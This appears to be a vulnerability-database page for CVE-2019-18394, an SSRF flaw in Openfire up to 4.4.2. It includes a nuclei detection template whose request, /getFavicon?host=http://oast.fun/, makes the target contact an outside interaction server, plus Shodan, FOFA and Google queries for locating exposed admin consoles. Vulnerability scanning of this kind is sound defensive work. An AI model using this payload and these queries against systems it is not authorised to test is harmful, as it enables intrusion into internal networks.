Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-18394
HistoryAug 04, 2020 - 3:24 p.m.

Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery

2020-08-0415:24:23
ProjectDiscovery
github.com
6

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.5

Confidence

High

EPSS

0.568

Percentile

97.8%

Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.

id: CVE-2019-18394

info:
  name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
  author: pdteam
  severity: critical
  description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
  impact: |
    An attacker can exploit this vulnerability to send crafted requests to internal resources, leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade to the latest version of Ignite Realtime Openfire (>=4.4.3) to fix this vulnerability.
  reference:
    - https://swarm.ptsecurity.com/openfire-admin-console/
    - https://github.com/igniterealtime/Openfire/pull/1497
    - https://nvd.nist.gov/vuln/detail/CVE-2019-18394
    - https://github.com/sobinge/nuclei-templates
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-18394
    cwe-id: CWE-918
    epss-score: 0.70889
    epss-percentile: 0.98041
    cpe: cpe:2.3:a:igniterealtime:openfire:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: igniterealtime
    product: openfire
    shodan-query:
      - http.title:"openfire admin console"
      - http.title:"openfire"
    fofa-query:
      - title="openfire"
      - title="openfire admin console"
    google-query:
      - intitle:"openfire"
      - intitle:"openfire admin console"
  tags: cve,cve2019,ssrf,openfire,oast,igniterealtime

http:
  - method: GET
    path:
      - "{{BaseURL}}/getFavicon?host=http://oast.fun/"

    matchers:
      - type: dsl
        dsl:
          - "contains(body, 'Interactsh Server')"
          - status_code == 200
        condition: and
# digest: 4a0a0047304502205e4c34a54e7f6b8d3c33e7ce5295f046a808875c3a14fc9f382dc4826356d608022100a4de6b7fd71604125a8f871e653777afb9f4b796bb1dbfbf4a1f78d04ef4d752:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.5

Confidence

High

EPSS

0.568

Percentile

97.8%